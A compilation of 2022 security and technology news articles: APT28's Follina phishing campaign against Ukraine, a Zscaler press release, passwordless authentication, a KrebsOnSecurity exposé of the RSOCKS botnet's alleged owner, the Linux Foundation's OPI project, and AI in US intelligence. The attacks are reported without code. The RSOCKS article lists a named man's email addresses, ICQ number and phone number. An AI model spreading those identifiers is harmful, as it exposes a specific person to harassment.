Researchers have spotted the threat group, also known as Fancy Bear and Sofacy, using the Windows MSDT vulnerability to distribute information stealers to users in Ukraine.

Russia’s notorious advanced persistent threat group APT28 is the latest in a growing number of attackers trying to exploit the “Follina” vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows.

Researchers from Malwarebytes this week observed the threat actor — aka Fancy Bear and Sofacy — sending out a malicious document with an exploit for the now-patched flaw (CVE-2022-30190) via phishing emails to users in Ukraine. The document was titled “Nuclear Terrorism A Very Real Threat.rtf" and appeared designed to prey on fears about the war in Ukraine spiraling into a nuclear holocaust. 

Malwarebytes identified the contents of the document as a May 10 article from the Atlantic Council on the potential for Russian President Vladimir Putin to use nuclear weapons in Ukraine.

Users who opened the document ended up having a new version of a previously known .Net credential stealer loaded on their systems via the Follina exploit, which made headlines as a zero-day earlier this month. The malware is designed to steal usernames, passwords, and URLs from Chrome and Microsoft Edge browsers. It can also grab all stored cookies in Chrome, Malwarebytes researchers say.

Ukraine’s Computer Emergency Response Team (CERT-UA) separately warned of the same threat. In an advisory, it said it had spotted APT28 using the same malicious document that Malwarebytes reported to try and distribute the CredoMap credential-stealing malware to users in Ukraine. 

Available telemetry suggests that the adversary has been using the document since at least June 10, CERT-UA says.

“The target, and the involvement of APT28, (a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state,” states Malwarebytes in a report Tuesday on the new activity.

**The Follina Feeding Frenzy**

The Follina bug in MSDT exists in all current versions of Windows and can be exploited via malicious Microsoft Office documents. To trigger it, all an attacker needs to do is call MSDT from an Office app, such as Word, using the URL protocol. Attackers can exploit the flaw to gain remote control of vulnerable systems and take a variety of malicious actions on them, including executing malicious code, installing programs, modifying data, and creating new accounts. 

Microsoft disclosed the flaw in late May amid widespread zero-day exploit activity. The company finally issued a fix for the vulnerability in its Patch Tuesday set of monthly security updates for June.

Malwarebytes describes the Ukrainian campaign as the first time it had observed APT28 exploiting Follina. But numerous other groups, including other state-backed actors, have been actively exploiting the vulnerability in recent weeks.

Many of the attacks have targeted Ukrainian entities. Earlier this month, for instance, CERT-UA warned about a threat actor — likely Russia’s Sandworm APT group — using a Follina exploit in a “massive cyberattack” targeting media organizations in Ukraine. 

And just this week, CERT-UA warned about a threat group it is tracking as UAC-0098, which is targeting critical infrastructure facilities in Ukraine with a tax-themed document carrying a Follina exploit. According to the CERT-UA, the attackers in this campaign are exploiting Follina to drop the Cobalt Strike Beacon post-compromise attack tool on compromised systems.

Other reports of Follina-related activity have emerged as well, suggesting the flaw is of high interest to attackers and needs to be addressed quickly. Earlier this month, Proofpoint reported that it had blocked a likely stated-backed phishing campaign involving a Follina exploit that targeted a handful of its customers. The phishing email masqueraded as a document about a salary increase, which if opened would have resulted in a PowerShell script being downloaded to the system.

Symantec, too, has reported observing a variety of threat actors exploiting Follina to distribute different malicious payloads, including the AsyncRAT remote access Trojan and another unnamed malware for stealing cookies and save login data from browsers such as Chrome, Edge and Firefox.

Russia's APT28 Launches Nuke-Themed Follina Exploit Campaign

Organizations can strengthen their network defense with a number of intelligent security innovations.

San Jose, California, June 22, 2022 / Las Vegas, Nevada, June 22, 2022

Zscaler, Inc. (NASDAQ: ZS), the leader in cloud security, today announced newly advanced AI/ML innovations powered by the largest security cloud in the world for unparalleled user protection and digital experience monitoring. The new capabilities further enhance Zscaler’s Zero Trust Exchange™ security platform to enable organizations to implement a Security Service Edge (SSE) that protects against the most advanced cyberattacks, while delivering an exceptional digital experience to users, and simplifying adoption of a zero trust architecture.

Organizations are facing a 314 percent increase in cyberattacks on encrypted internet traffic and an 80 percent increase in ransomware with nearly a 120 percent increase in double extortion attacks. Phishing is also on the rise with industries like financial services, government and retail seeing annual increases in attacks of over 100 percent in 2021. To combat advancing threats, organizations need to adapt their defenses to real-time changes in risk. However, lean-running IT and security teams are experiencing security alert fatigue with increasing exposure to real-time threats and often don’t have the resources or skills to effectively investigate and respond to the mounting volume of threats. Zscaler is addressing these challenges by providing one-click root cause analysis to instantly identify the issues behind poor digital experience, freeing up IT and security teams from troubleshooting to focus on preventing attacks. AI-powered security helps IT professionals by automating threat detection to deliver better and faster protection.

Zscaler operates the largest in-line security cloud, which inspects over 240 billion data transactions daily and blocks 150 million daily attacks across the globe to dramatically expedite investigation, response and resolution times, and pinpoint potential malware to stop breaches and data loss. Zscaler is uniquely equipped to train its AI/ML models for superior accuracy in automating threat responses and making policy recommendations to security teams. From faster threat detection to freeing up resources, Zscaler’s Zero Trust platform enables IT and security teams to reduce the constant fire drill of manually chasing alerts and trying to identify new threats.

“Cybercriminals are using AI, automation, and advanced techniques to train machines to hack or socially engineer victims faster than ever before,” said Amit Sinha, President, Zscaler. “To help our customers combat these escalating techniques, we’ve dramatically advanced AI and machine learning in our cloud to take advantage of our massive data pool, giving our customers granular real-time risk visibility and a solution to combat attackers that no other security vendor can provide.”

Utilizing Zscaler’s AI-powered Zero Trust platform, organizations can now strengthen their network defense with the following intelligent security innovations:

*   **AI-powered phishing prevention:** Detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, expert ThreatLabz research, and dynamic browser isolation.
*   **AI-powered segmentation:** Simplify user-to-app segmentation to minimize the attack surface and stop lateral movement with AI-based policy recommendations trained by millions of cross-customer signals across private app telemetry, user context, behavior, and location.
*   **Autonomous risk-based policy engine:** Dynamically adapt security and access policies in real-time across the Zscaler™ Zero Trust Exchange to maintain network integrity against rapidly-evolving cyber threats. The new capabilities also allow security teams to customize policies based on risk scoring for users, devices, apps, and content.
*   **AI-powered root cause analysis:** Accelerate mean time to resolution putting impacted end users back to work in a matter of seconds by identifying root causes of poor user experiences 180 times faster, freeing IT from time-consuming troubleshooting and analysis.

“Delivering seamless digital experiences, from employee devices to the applications they need, goes hand in hand with securing our sensitive business applications and data, no matter where it resides,” said Darren Beattie, Modern Workplace and Security Operations Manager at Auckland New Zealand-headquartered Tower Limited. “Zscaler’s integrated cloud platform helped us effortlessly adopt a zero trust architecture, reduce risk, accelerate our digital transformation, and achieve business goals.”

“With Zscaler’s AI-powered Zero Trust platform based on a SSE framework, we are able to augment and expand the reach of our IT and security team to stop the growing frequency of advanced cyberattacks,” said Stephen Bailey, Vice President of Information Technology at Cache Creek Casino Resort. “The threat landscape is constantly evolving, and these new AI capabilities will effectively enable us to see real-time changes in risk, automate our response process, and stay ahead of the attackers.”

For more details about Zscaler’s AI-powered Security Service Edge (SSE) platform, please see here.

About Zscaler

Zscaler (NASDAQ: ZS) accelerates digital transformation so customers can be more agile, efficient, resilient, and secure. The Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting users, devices, and applications in any location. Distributed across more than 150 data centers globally, the SSE-based Zero Trust Exchange is the world’s largest in-line cloud security platform.

Zscaler Adds New AI/ML Capabilities for the Zscaler Zero Trust Exchange

Using WebAuthn, physical keys, and biometrics, organizations can adopt more advanced passwordless MFA and true passwordless systems. (Part 2 of 2)

_The first article of this two-part series examined ways to improve multifactor authentication (MFA) and boost adoption. This story takes a look at how organizations can adopt more advanced passwordless MFA and true passwordless systems._

Getting to passwordless won't be easy, but the concept is finally gaining momentum. Although several vendors have offered passwordless MFA and true passwordless technology for a few years — mostly relegated to enterprise use — a more comprehensive framework is now taking shape. Apple, Google, and Microsoft have jointly agreed to adopt passwordless in earnest.

For example, Apple will be introducing Passkeys, which completely replace passwords used to log into websites, in a few months. The framework, based on the FIDO Alliance standard, uses biometrics such as Face ID to generate a unique, encrypted digital key that resides only on the device and within an encrypted keychain used for other Apple devices, including the iPhone, iPad, Mac, and Apple TV. This makes it impervious to phishing and other forms of data extraction.

In 2020, Microsoft turned to biometrics for authentication in Windows 10 and Windows 365 — and the company is also expanding passwordless to websites. In addition, all three companies are adding the ability to transfer this identity data across authenticated devices and systems. In the past, changing phones or other devices typically meant reinstalling credentials — a time-consuming and irritating task.

In addition to building biometrics and other security mechanisms into their operating systems, the Big Three are introducing software development kits (SDKs) that companies can use to build passwordless websites. As a result, it will soon be possible for consumers to begin ditching passwords for compliant sites and services. Like Apple's Passkey, a mobile phone or other registered device authenticates the person and then sends the request to the server without sending the biometric data.

"Where the big vendors lead, everyone else follows," says Don Tait, a senior analyst for Omdia.

At the heart of this transformation is the FIDO Alliance. "It is a classic example of the impact of consumerization on technology," adds Rik Turner, a senior analyst at Omdia. "As people begin to use tools in their private lives, they begin to seep into the workplace."

**A Matter of Identity**

Security experts say that the first step in building a better authentication framework is to stop using outdated methods like secret words and one-time codes to verify users. Even push apps are vulnerable to exploits. For example, crooks who gain access to a company's network or an MFA system can generate fake authentication requests that someone might authorize in a moment of distraction or inattentiveness.

Even highly secure YubiKeys and other U2F tokens aren't exempt from vulnerabilities and workarounds. For example, if a user forgets the key or can't use it for some reason, the typical workaround is to revert to a text code or less secure form of MFA as the backup. At that point, even an ultra-secure digital token can't provide protection.

A deeper and broader use of biometrics and user verification methods, including presence-based authentication and behavioral or activity-based models, is key. This includes the use of the FIDO protocol WebAuthn, which delivers an API that supports strong, public-key cryptography registration and authentication. It can be combined with a continuous authentication method that reverifies the identity of the session through a persistent token.

Several companies, including Beyond Identity, Veriff, 1Kosmos, and Jumio, have adopted this type of approach. They rely on FIDO standards that tie into biometrics, along with a highly secure identity proofing method. Typically, they ask users to provide a document such as a driver's license or a passport, which is securely stored in an app on the device. A selfie or face scan ensures that everything matches and authenticates the user.

For example, Veriff, which works in 190 countries, in 35 languages, and with 8,000 IDs, runs an online blockchain-based identity verification within a few seconds. It uses an AI-supported decision engine that incorporates real-time feedback through a document check, biometric scan, face comparison, background video, and device and network analytics. Financial institutions, healthcare providers, and others that use the technology can also reduce fake accounts and fraud.

"This creates a barrier that is much more difficult for an intelligent and determined bad actor to bypass," says Kalev Rundu, senior product manager at Veriff. "People today are much more willing to use biometrics for authentication, but they are only ready to do it if they receive real value in return and they can maintain control over how and where their data is used."

**Forward Thinking**

The move to passwordless MFA and true passwordless remains a slow march. For now, advanced authentication is more viable within the enterprise, where it's a closed and controlled environment. Michael Engle, co-founder and CSO at passwordless MFA solutions vendor 1kosmos, estimates that 80% of passwords can be eliminated almost immediately with the right strategy and tools.

For now, Omdia analysts Tait and Turner recommend migrating to passwordless MFA without delay. Not only does the framework deliver a better and safer customer experience, but it can also drive revenue growth, they argue. In addition, it's wise to phase in true passwordless systems and build on them through the FIDO Alliance, as well through Apple Passkeys and the equivalent passwordless systems at Google and Microsoft.

Along the way, it's also essential to educate customers and employees about passwordless authentication and ensure that people understand that their biometric data is being used as their gateway to apps and the Internet. The combination of better UX, incentives, and more streamlined processes can, over the long term, boost security, improve trust, and trim security costs.

Says Jasson Casey, CTO for Beyond Identity: "In the end, the objective isn't to eliminate passwords, though that's a noble cause. It's to create better security and a safer computing environment for everyone."

Evolving Beyond the Password: Vanquishing the Password

Authorities in the United States, Germany, the Netherlands and the U.K. last week said they dismantled the "RSOCKS" botnet, a collection of millions of hacked devices that were sold as "proxies" to cybercriminals looking for ways to route their malicious traffic through someone else's computer. While the coordinated action did not name the Russian hackers allegedly behind RSOCKS, KrebsOnSecurity has identified its owner as a Russian man living abroad who also runs the world's top Russian spamming forum.

Authorities in the United States, Germany, the Netherlands and the U.K. last week said they dismantled the “**RSOCKS**” botnet, a collection of millions of hacked devices that were sold as “proxies” to cybercriminals looking for ways to route their malicious traffic through someone else’s computer. While the coordinated action did not name the Russian hackers allegedly behind RSOCKS, KrebsOnSecurity has identified its owner as a 35-year-old Russian man living abroad who also runs the world’s top spam forum.

The RUSdot mailer, the email spamming tool made and sold by the administrator of RSOCKS.

According to a statement by the **U.S. Department of Justice**, RSOCKS offered clients access to IP addresses assigned to devices that had been hacked:

“A cybercriminal who wanted to utilize the RSOCKS platform could use a web browser to navigate to a web-based ‘storefront’ (i.e., a public web site that allows users to purchase access to the botnet), which allowed the customer to pay to rent access to a pool of proxies for a specified daily, weekly, or monthly time period. The cost for access to a pool of RSOCKS proxies ranged from $30 per day for access to 2,000 proxies to $200 per day for access to 90,000 proxies.”

The DOJ’s statement doesn’t mention that RSOCKS has been in operation since 2014, when access to the web store for the botnet was first advertised on multiple Russian-language cybercrime forums.

The user “RSOCKS” on the Russian crime forum **Verified** changed his name to RSOCKS from a previous handle: “**Stanx**,” whose very first sales thread on Verified in 2016 quickly ran afoul of the forum’s rules and prompted a public chastisement by the forum’s administrator.

Verified was hacked twice in the past few years, and each time the private messages of all users on the forum were leaked. Those messages show that after being warned of his forum infraction, Stanx sent a private message to the Verified administrator detailing his cybercriminal bona fides.

“I am the owner of the RUSdot forum (former Spamdot),” Stanx wrote in Sept. 2016. “In spam topics, people know me as a reliable person.”

A Google-translated version of the Rusdot spam forum.

RUSdot is the successor forum to **Spamdot**, a far more secretive and restricted forum where most of the world’s top spammers, virus writers and cybercriminals collaborated for years before the community’s implosion in 2010. Even today, the RUSdot Mailer is advertised for sale at the top of the RUSdot community forum.

Stanx said he was a longtime member of several major forums, including the Russian hacker forum **Antichat** (since 2005), and the Russian crime forum **Exploit** (since April 2013). In an early post to Antichat in January 2005, Stanx disclosed that he is from **Omsk**, a large city in the Siberian region of Russia.

According to the cyber intelligence firm Intel 471, the user Stanx indeed registered on Exploit in 2013, using the email address **stanx@rusdot.com**, and the ICQ number **399611**. A search in Google for that ICQ number turns up a cached version of a Vkontakte profile for a **Denis “Neo” Kloster**, from Omsk, Russia.

Cybersecurity firm Constella Intelligence shows that in 2017, someone using the email address **istanx@gmail.com** registered at the Russian freelancer job site **fl.ru** with the profile name of “**Denis Kloster**” and the Omsk phone number of **79136334444**. Another record indexed by Constella suggests Denis’s real surname may in fact be “**Emilyantsev**” \[Емельянцев\].

That phone number is tied to the WHOIS registration records for multiple domain names over the years, including **proxy\[.\]info**, **allproxy\[.\]info**, **kloster.pro** and **deniskloster.com**.

A copy of the passport for Denis Kloster, as posted to his Vkontakte page in 2019. It shows that in Oct. 2019, he obtained a visa from the American Embassy in Bangkok, Thailand.

The “about me” section of DenisKloster.com says the 35-year-old was born in Omsk, that he got his first computer at age 12, and graduated from high school at 16. Kloster says he’s worked in many large companies in Omsk as a system administrator, web developer and photographer.

According to Kloster’s blog, his first real job was running an “online advertising” firm he founded called **Internet Advertising Omsk** (“**riOmsk**“), and that he even lived in New York City for a while.

“Something new was required and I decided to leave Omsk and try to live in the States,” Kloster wrote in 2013. “I opened an American visa for myself, it was not difficult to get. And so I moved to live in New York, the largest city in the world, in a country where all wishes come true. But even this was not enough for me, and since then I began to travel the world.”

The current version of the About Me page on Kloster’s site says he closed his advertising business in 2013 to travel the world and focus on his new company: One that provides security and anonymity services to customers around the world. Kloster’s vanity website and LinkedIn page both list him as CEO of a company called “**SL MobPartners**.”

In 2016, Deniskloster.com featured a post celebrating three years in operation. The anniversary post said Kloster’s anonymity business had grown to nearly two dozen employees, most of whom were included in a group photo posted to that article (and some of whom Kloster thanked by their first names and last initials).

The employees who kept things running for RSOCKS, circa 2016.

“Thanks to you, we are now developing in the field of information security and anonymity!,” the post enthuses. “We make products that are used by thousands of people around the world, and this is very cool! And this is just the beginning!!! We don’t just work together and we’re not just friends, we’re Family.”

Mr. Kloster did not respond to repeated requests for comment.

It’s not clear if the coordinated takedown targeting the RSOCKS botnet will be permanent, as the botnet’s owners could simply rebuild — and possibly rebrand — their crime machine. Based on the RSOCKS owner’s posts, that is exactly what they intend to do.

“RSocks ceases to exist,” wrote the Rsocks account on the BlackHatWorld forum on June 17. “But don’t worry. All the active plans and fund balances will be transferred to another service. Stay tuned. We will inform you about its name and all the details later.”

Rsocks told the BlackHatWorld community they would be back soon under a new name.

Malware-based proxy services like RSOCKS have struggled to remain competitive in a cybercrime market with increasingly sophisticated proxy services that offer many additional features. The demise of RSOCKS follows closely on the heels of **VIP72\[.\]com**, a competing proxy botnet service that operated for a decade before its owners pulled the plug on the service last year.

Meet the Administrators of the RSOCKS Proxy Botnet

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware.
Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware.

Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism A Very Real Threat.rtf" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.

Follina (CVE-2022-30190, CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, 2022, as part of its Patch Tuesday updates.

According to an independent report published by Malwarebytes, CredoMap is a variant of the .NET-based credential stealer that Google Threat Analysis Group divulged last month as having been deployed against users in Ukraine.

The malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.

"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence," Malwarebytes said. "The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state."

It's not just APT28. CERT-UA has further warned of similar attacks mounted by Sandworm and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts.

The development comes as Ukraine continues to be a target for cyberattacks amidst the country's ongoing war with Russia, with Armageddon hackers also spotted distributing the GammaLoad.PS1\_v2 malware in May 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine

Data Processing and Infrastructure Processing Units – DPU and IPU – are changing the way enterprises deploy and manage compute resources across their networks.

SAN FRANCISCO, June 21, 2022 /PRNewswire/ -- The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the new Open Programmable Infrastructure (OPI) Project. OPI will foster a community-driven, standards-based open ecosystem for next-generation architectures and frameworks based on DPU and IPU technologies. OPI is designed to facilitate the simplification of network, storage and security APIs within applications to enable more portable and performant applications in the cloud and datacenter across DevOps, SecOps and NetOps.

Founding members of OPI include Dell Technologies, F5, Intel, Keysight Technologies, Marvell, NVIDIA and Red Hat with a growing number of contributors representing a broad range of leading companies in their fields ranging from silicon and device manufactures, ISVs, test and measurement partners, OEMs to end users.

"When new technologies emerge, there is so much opportunity for both technical and business innovation but barriers often include a lack of open standards and a thriving community to support them," said Mike Dolan, senior vice president of Projects at the Linux Foundation. "DPUs and IPUs are great examples of some of the most promising technologies emerging today for cloud and datacenter, and OPI is poised to accelerate adoption and opportunity by supporting an ecosystem for DPU and IPU technologies."

DPUs and IPUs are increasingly being used to support high-speed network capabilities and packet processing for applications like 5G, AI/ML, Web3, crypto and more because of their flexibility in managing resources across networking, compute, security and storage domains. Instead of the servers being the infrastructure unit for cloud, edge or the data center, operators can now create pools of disaggregated networking, compute and storage resources supported by DPUs, IPUs, GPUs, and CPUs to meet their customers' application workloads and scaling requirements.

OPI will help establish and nurture an open and creative software ecosystem for DPU and IPU-based infrastructures. As more DPUs and IPUs are offered by various vendors, the OPI Project seeks to help define the architecture and frameworks for the DPU and IPU software stacks that can be applied to any vendor's hardware offerings. The OPI Project also aims to foster a rich open source application ecosystem, leveraging existing open source projects, such as DPDK, SPDK, OvS, P4, etc., as appropriate. The project intends to:

*   Define DPU and IPU,
*   Delineate vendor-agnostic frameworks and architectures for DPU- and IPU-based software stacks applicable to any hardware solutions,
*   Enable the creation of a rich open source application ecosystem,
*   Integrate with existing open source projects aligned to the same vision such as the Linux kernel, and,
*   Create new APIs for interaction with, and between, the elements of the DPU and IPU ecosystem, including hardware, hosted applications, host node, and the remote provisioning and orchestration of software

With several working groups already active, the initial technology contributions will come in the form of the Infrastructure Programmer Development Kit (IPDK) that is now an official sub-project of OPI governed by the Linux Foundation. IPDK is an open source framework of drivers and APIs for infrastructure offload and management that runs on a CPU, IPU, DPU or switch. In addition, NVIDIA DOCA, an open source software development framework for NVIDIA's BlueField DPU, will be contributed to OPI to help developers create applications that can be offloaded, accelerated, and isolated across DPUs, IPUs, and other hardware platforms.

For more information visit: https://opiproject.org; start contributing here: https://github.com/opiproject/opi.

**Founding Member Comments**

**_Geng Lin, EVP and Chief Technology Officer, F5  
_**"The emerging DPU market is a golden opportunity to reimagine how infrastructure services can be deployed and managed. With collective collaboration across many vendors representing both the silicon devices and the entire DPU software stack, an ecosystem is emerging that will provide a low friction customer experience and achieve portability of services across a DPU enabled infrastructure layer of next generation data centers, private clouds, and edge deployments."

**_Patricia Kummrow, CVP and GM, Ethernet Products Group, Intel  
_**Intel is committed to open software to advance collaborative and competitive ecosystems and is pleased to be a founding member of the Open Programmable Infrastructure project, as well as fully supportive of the Infrastructure Processor Development Kit (IPDK) as part of OPI. We look forward to advancing these tools, with the Linux Foundation, fulfilling the need for a programmable infrastructure across cloud, data center, communication and enterprise industries making it easier for developers to accelerate innovation and advance technological developments.

**_Ram Periakaruppan, VP and General Manager, Network Test and Security Solutions Group, Keysight Technologies  
_**"Programmable infrastructure built with DPUs/IPUs enables significant innovation for networking, security, storage and other areas in disaggregated cloud environments. As a founding member of the Open Programmable Infrastructure Project, we are committed to providing our test and validation expertise as we collaboratively develop and foster a standards-based open ecosystem that furthers infrastructure development, enabling cloud providers to maximize their investment."

**Cary Ussery, Vice President, Software and Support, Processors, Marvell  
**Data center operators across multiple industry segments are increasingly incorporating DPUs as an integral part of their infrastructure processing to offload complex workloads from general purpose to more robust compute platforms. Marvell strongly believes that software standardization in the ecosystem will significantly contribute to the success of workload acceleration solutions. As a founding member of the OPI Project, Marvell aims to address the need for standardization of software frameworks used in provisioning, lifecycle management, orchestration, virtualization and deployment of workloads.

**_Kevin Deierling, vice president of Networking at NVIDIA  
_**"The fundamental architecture of data centers is evolving to meet the demands of private and hyperscale clouds and AI, which require extreme performance enabled by DPUs such as the NVIDIA BlueField and open frameworks such as NVIDIA DOCA. These will support OPI to provide BlueField users with extreme acceleration, enabled by common, multi-vendor management and applications. NVIDIA is a founding member of the Linux Foundation's Open Programmable Infrastructure Project to continue pushing the boundaries of networking performance and accelerated data center infrastructure while championing open standards and ecosystems."

**_Erin Boyd, director of emerging technologies, Red Hat  
_**"As a founding member of the Open Programmable Infrastructure project, Red Hat is committed to helping promote, grow and collaborate on the emergent advantage that new hardware stacks can bring to the cloud-native community, and we believe that the formalization of OPI into the Linux Foundation is an important step toward achieving this in an open and transparent fashion. Establishing an open standards-based ecosystem will enable us to create fully programmable infrastructure, opening up new possibilities for better performance, consumption, and the ability to more easily manage unique hardware at scale."

**About the Linux Foundation**

Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members and is the world's leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation's projects are critical to the world's infrastructure including Linux, Kubernetes, Node.js, Hyperledger, RISC-V, and more. The Linux Foundation's methodology focuses on leveraging best practices and addressing the needs of contributors, users and solution providers to create sustainable models for open collaboration. For more information, please visit us at linuxfoundation.org.

The Linux Foundation has registered trademarks and uses trademarks. For a list of trademarks of The Linux Foundation, please see its trademark usage page: _www.linuxfoundation.org/trademark-usage_. Linux is a registered trademark of Linus Torvalds. Red Hat is a registered trademark of Red Hat, Inc. or its subsidiaries in the U.S. and other countries.

_Marvell Disclaimer: This press release contains forward-looking statements within the meaning of the federal securities laws that involve risks and uncertainties. Forward-looking statements include, without limitation, any statement that may predict, forecast, indicate or imply future events or achievements. Actual events or results may differ materially from those contemplated in this press release. Forward-looking statements speak only as of the date they are made. Readers are cautioned not to put undue reliance on forward-looking statements, and no person assumes any obligation to update or revise any such forward-looking statements, whether as a result of new information, future events or otherwise._

Linux Foundation Announces Open Programmable Infrastructure Project to Drive Open Standards for New Class of Cloud Native Infrastructure

In the wake of devastating attacks, here are some of the best techniques and policies a company can implement to protect its data.

Artificial Intelligence and Security: What You Should Know

Joshua Bevitz, Partner, Newmeyer Dillion

Gabriella Stevens, Associate, Newmeyer Dillion

Prashant Sharma, Co-Founder & CTO, Secuvy Inc.

7 Ways to Avoid Worst-Case Cyber Scenarios

Artificial intelligence use is booming, but it's not the secret weapon you might imagine.

From cyber operations to disinformation, artificial intelligence extends the reach of national security threats that can target individuals and whole societies with precision, speed, and scale. As the US competes to stay ahead, the intelligence community is grappling with the fits and starts of the impending revolution brought on by AI.

The US intelligence community has launched initiatives to grapple with AI’s implications and ethical uses, and analysts have begun to conceptualize how AI will revolutionize their discipline, yet these approaches and other practical applications of such technologies by the IC have been largely fragmented.

As experts sound the alarm that the US is not prepared to defend itself against AI by its strategic rival, China, Congress has called for the IC to produce a plan for integration of such technologies into workflows to create an “AI digital ecosystem” in the 2022 Intelligence Authorization Act.

The term AI is used for a group of technologies that solve problems or perform tasks that mimic humanlike perception, cognition, learning, planning, communication, or actions. AI includes technologies that can theoretically survive autonomously in novel situations, but its more common application is machine learning or algorithms that predict, classify, or approximate empiric-like results using big data, statistical models, and correlation.

While AI that can mimic humanlike sentience remains theoretical and impractical for most IC applications, machine learning is addressing fundamental challenges created by the volume and velocity of information that analysts are tasked with evaluating today.

At the National Security Agency, machine learning finds patterns in the mass of signals intelligence collects from global web traffic. Machine learning also searches international news and other publicly accessible reporting by the CIA's Directorate of Digital Innovation, responsible for advancing digital and cyber technologies in human and open-source collection, as well as its covert action and all-source analysis, which integrates all kinds of raw intelligence collected by US spies, whether technical or human. An all-source analyst evaluates the significance or meaning when that intelligence is taken together, memorializing it into finished assessments or reports for national security policymakers.

In fact, open source is key to the adoption of AI technologies by the intelligence community. Many AI technologies depend on big data to make quantitative judgments, and the scale and relevance of public data cannot be replicated in classified environments.

Capitalizing on AI and open source will enable the IC to utilize other finite collection capabilities, like human spies and signals intelligence collection, more efficiently. Other collection disciplines can be used to obtain the secrets that are hidden from not just humans but AI, too. In this context, AI may supply better global coverage of unforeseen or non-priority collection targets that could quickly evolve into threats.

Meanwhile, at the National Geospatial-Intelligence Agency, AI and machine learning extract data from images that are taken daily from nearly every corner of the world by commercial and government satellites. And the Defense Intelligence Agency trains algorithms to recognize nuclear, radar, environmental, material, chemical, and biological measurements and to evaluate these signatures, increasing the productivity of its analysts.

In one example of the IC’s successful use of AI, after exhausting all other avenues—from human spies to signals intelligence—the US was able to find an unidentified WMD research and development facility in a large Asian country by locating a bus that traveled between it and other known facilities. To do that, analysts employed algorithms to search and evaluate images of nearly every square inch of the country, according to a senior US intelligence official who spoke on background with the understanding of not being named.

While AI can calculate, retrieve, and employ programming that performs limited rational analyses, it lacks the calculus to properly dissect more emotional or unconscious components of human intelligence that are described by psychologists as system 1 thinking.

AI, for example, can draft intelligence reports that are akin to newspaper articles about baseball, which contain structured non-logical flow and repetitive content elements. However, when briefs require complexity of reasoning or logical arguments that justify or demonstrate conclusions, AI has been found lacking. When the intelligence community tested the capability, the intelligence official says, the product looked like an intelligence brief but was otherwise nonsensical.

Such algorithmic processes can be made to overlap, adding layers of complexity to computational reasoning, but even then those algorithms can’t interpret context as well as humans, especially when it comes to language, like hate speech.

AI’s comprehension might be more analogous to the comprehension of a human toddler, says Eric Curwin, chief technology officer at Pyrra Technologies, which identifies virtual threats to clients from violence to disinformation. “For example, AI can understand the basics of human language, but foundational models don’t have the latent or contextual knowledge to accomplish specific tasks,” Curwin says.

“From an analytic perspective, AI has a difficult time interpreting intent,” Curwin adds. “Computer science is a valuable and important field, but it is social computational scientists that are taking the big leaps in enabling machines to interpret, understand, and predict behavior.”

In order to “build models that can begin to replace human intuition or cognition,” Curwin explains, “researchers must first understand how to interpret behavior and translate that behavior into something AI can learn.”

Although machine learning and big data analytics provide predictive analysis about what might or will likely happen, it can’t explain to analysts how or why it arrived at those conclusions. The opaqueness in AI reasoning and the difficulty vetting sources, which consist of extremely large data sets, can impact the actual or perceived soundness and transparency of those conclusions.

Transparency in reasoning and sourcing are requirements for the analytical tradecraft standards of products produced by and for the intelligence community. Analytic objectivity is also statuatorically required, sparking calls within the US government to update such standards and laws in light of AI’s increasing prevalence.

Machine learning and algorithms when employed for predictive judgments are also considered by some intelligence practitioners as more art than science. That is, they are prone to biases, noise, and can be accompanied by methodologies that are not sound and lead to errors similar to those found in the criminal forensic sciences and arts.

“Algorithms are just a set of rules, and by definition are objective because they’re totally consistent,” says Welton Chang, cofounder and CEO of Pyrra Technologies. With algorithms, objectivity means applying the same rules over and over. Evidence of subjectivity, then, is the variance in the answers.

“It’s different when you consider the tradition of the philosophy of science,” says Chang. “The tradition of what counts as subjective is a person's own perspective and bias. Objective truth is derived from consistency and agreement with external observation. When you evaluate an algorithm solely on its outputs and not whether those outputs match reality, that’s when you miss the bias built in.”

Depending on the presence or absence of bias and noise within massive data sets, especially in more pragmatic, real-world applications, predictive analysis has sometimes been described as “astrology for computer science.” But the same might be said of analysis performed by humans. A scholar on the subject, Stephen Marrin, writes that intelligence analysis as a discipline by humans is “merely a craft masquerading as a profession.”

Analysts in the US intelligence community are trained to use structured analytic techniques, or SATs, to make them aware of their own cognitive biases, assumptions, and reasoning. SATs—which use strategies that run the gamut from checklists to matrixes that test assumptions or predict alternative futures—externalize the thinking or reasoning used to support intelligence judgments, which is especially important given the fact that in the secret competition between nation-states not all facts are known or knowable. But even SATs, when employed by humans, have come under scrutiny by experts like Chang, specifically for the lack of scientific testing that can evidence an SAT’s efficacy or logical validity.

